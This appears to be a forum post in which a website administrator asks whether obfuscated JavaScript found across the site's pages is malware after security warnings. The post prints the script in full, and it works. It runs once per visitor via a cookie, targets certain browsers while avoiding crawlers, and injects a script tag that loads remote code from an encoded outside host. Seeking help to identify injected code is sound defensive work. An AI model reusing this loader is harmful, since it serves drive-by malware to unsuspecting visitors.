Hello,
I am the site administrator/content manager for http://socialism.com
We have previously received warnings from Bing that our website contained malicious JavaScript and references to Malware networks, but since I was unable to find these specific instances, I assumed Bing was being overly cautious. Furthermore, Google has never given us such warnings:
http://www.google.com/safebrowsing/diagnostic?site=socialism.com
I have run our site through Securi SiteCheck, Wepawet, Zulu Risk Scanner, and VirusTotal. All but one say our site is clean or benign, with Wepawet claiming that our website may be suspicious but unable to point to anything in particular.
http://zulu.zscaler.com/submission/show/9c333b21a4f3b6a9531753d912caefb8-1417810824
Today, however, one of our users received this message while trying to access our site:
http://i.imgur.com/LivZV6F.jpg
Is this a false positive?
Many (all?) of the pages on our site do contain a block of obfuscated JavaScript that I have been unable to identify.
var _0x45af = ["\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65",
"\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67",
"", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x20\x70\x61\x74\x68\x3D\x2F", "\x3B",
"\x73\x70\x6C\x69\x74", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67",
"\x63\x68\x61\x72\x41\x74", "\x20", "\x69\x6E\x64\x65\x78\x4F\x66",
"\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x61\x64\x66\x5F\x70\x72\x6F\x64\x73",
"\x65", "\x3C", "\x6F\x72\x67", "\x6A\x73", "\x74", "\x44\x61\x74\x61", "\x63\x64", "\x6E",
"\x73\x72\x63", "\x3E", "\x72\x74", "\x68\x74\x74\x70", "\x69\x70", "\x61\x64\x76",
"\x73\x63\x72", "\x69\x61", "\x6D\x65\x64", "\x6D\x61\x74\x63\x68",
"\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x3D\x22",
"\x3A\x2F\x2F", "\x2E", "\x2F\x67\x65\x74", "\x3F", "\x22", "\x2F", "\x77\x72\x69\x74\x65",
"\x6C\x69\x6E\x6B\x65\x64"];
function crCx(_0x9b9cx2, _0x9b9cx3, _0x9b9cx4){
if (_0x9b9cx4){
var _0x9b9cx5 = new Date();
_0x9b9cx5[_0x45af[1]](_0x9b9cx5[_0x45af[0]]() + (_0x9b9cx4 * 24 * 60 * 60 * 1000));
var _0x9b9cx6 = _0x45af[2] + _0x9b9cx5[_0x45af[3]]()
}
else {
var _0x9b9cx6 = _0x45af[4]
}
;
document[_0x45af[5]] = _0x9b9cx2 + _0x45af[6] + _0x9b9cx3 + _0x9b9cx6 + _0x45af[7]
}
;
function rdCx(_0x9b9cx2){
var _0x9b9cx8 = _0x9b9cx2 + _0x45af[6];
var _0x9b9cx9 = document[_0x45af[5]][_0x45af[9]](_0x45af[8]);
for (var _0x9b9cxa = 0; _0x9b9cxa < _0x9b9cx9[_0x45af[10]];
_0x9b9cxa ++ ){
var _0x9b9cxb = _0x9b9cx9[_0x9b9cxa];
while (_0x9b9cxb[_0x45af[12]](0) == _0x45af[13]){
_0x9b9cxb = _0x9b9cxb[_0x45af[11]](1, _0x9b9cxb[_0x45af[10]])
}
;
if (_0x9b9cxb[_0x45af[14]](_0x9b9cx8) == 0){
return _0x9b9cxb[_0x45af[11]](_0x9b9cx8[_0x45af[10]], _0x9b9cxb[_0x45af[10]])
}
}
;
return null
}
;
var rdscx = Math[_0x45af[16]](Math[_0x45af[15]]() * 10000);
var crUnqz = rdCx(_0x45af[17]);
var vbzl = _0x45af[18];
var vbza = _0x45af[19];
var vbzv = _0x45af[20];
var vbzn = _0x45af[21];
var vbzf = _0x45af[22];
var vbzb = _0x45af[23];
var vbzh = _0x45af[24];
var vbzj = _0x45af[25];
var vbzg = _0x45af[26];
var vbzq = _0x45af[27];
var vbzz = _0x45af[28];
var vbzm = _0x45af[29];
var vbzd = _0x45af[30];
var vbzk = _0x45af[31];
var vbzs = _0x45af[32];
var vbzc = _0x45af[33];
var vbzx = _0x45af[34];
if (crUnqz == null){
if ((navigator[_0x45af[36]][_0x45af[35]](/MSIE/i) || navigator[_0x45af[36]][_0x45af[35]](
/Trident/i) || navigator[_0x45af[36]][_0x45af[35]](/Firefox/i))){
if ((!navigator[_0x45af[36]][_0x45af[35]](/Linux/i) ||! navigator[_0x45af[36]][_0x45af[
35]](/Apple/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Chrome/i) ||! navigator[_0x45af[
36]][_0x45af[35]](/Crawler/i) ||! navigator[_0x45af[36]][_0x45af[35]](/bot/i) ||!
navigator[_0x45af[36]][_0x45af[35]](/Google/i) ||! navigator[_0x45af[36]][_0x45af[35]](
/Yahoo/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Python/i))){
if ((!document[_0x45af[37]][_0x45af[35]](/cache/i) ||! document[_0x45af[37]][_0x45af[
35]](/inurl/i))){
document[_0x45af[45]](_0x45af[4] + vbza + _0x45af[4] + vbzs + _0x45af[4] + vbzd +
_0x45af[4] + vbzf + _0x45af[13] + vbzg + _0x45af[38] + vbzm + _0x45af[39] + vbzh +
_0x45af[4] + vbzj + _0x45af[40] + vbzk + _0x45af[4] + vbzl + _0x45af[4] + vbzz +
_0x45af[4] + vbzx + _0x45af[4] + vbzc + _0x45af[40] + vbzv + _0x45af[41] + vbzb +
_0x45af[40] + vbzn + _0x45af[42] + rdscx + _0x45af[43] + vbzq + _0x45af[4] + vbza +
_0x45af[44] + vbzs + _0x45af[4] + vbzd + _0x45af[4] + vbzf + _0x45af[4] + vbzq +
_0x45af[4]);
crCx(_0x45af[17], _0x45af[46], 3)
}
}
}
}
;
Is this code causing a drive-by download/Trojan? Or is it a script to determine a User Agent?
I should add that I have only been working here for about a month, and I don’t know as much as I should in terms of what was present before I took over for the person before me.